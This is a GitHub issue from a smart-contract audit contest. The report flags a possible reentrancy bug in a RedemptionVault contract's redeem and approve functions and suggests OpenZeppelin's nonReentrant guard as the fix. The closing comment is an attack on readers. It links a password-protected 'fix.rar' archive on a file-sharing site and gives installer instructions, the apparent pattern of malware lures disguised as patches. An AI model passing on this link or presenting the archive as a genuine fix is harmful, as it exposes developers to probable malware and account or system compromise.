### ISSUE TITLE
admin - Reentrancy Vulnerability at redeemInstant, redeemRequest, redeemFiatReques and _approveRequest function for RedemptionVault contract

### ISSUE THREAD

**Issue by sherlock-admin2** [sherlock-audit/2024-08-midas-minter-redeemer-judging#6]
admin

High

# Reentrancy Vulnerability at redeemInstant, redeemRequest, redeemFiatReques and _approveRequest function for RedemptionVault contract

### Summary

Line: https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/RedemptionVault.sol#L313

The contract transfers tokens and burns mTokens before fully completing state changes in the _approveRequest function. This can potentially allow a reentrancy attack where a malicious actor re-enters the contract and manipulates the state or drains funds.

### Root Cause

Reentrancy

### Impact

reentrancy attack where a malicious actor re-enters the contract and manipulates the state or drains funds.

### Mitigation

 Implement the nonReentrant modifier from OpenZeppelin’s ReentrancyGuard on the relevant functions, especially in critical functions like redeemInstant, redeemRequest, redeemFiatRequest, and _approveRequest.

**Comment by mengyanshou** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
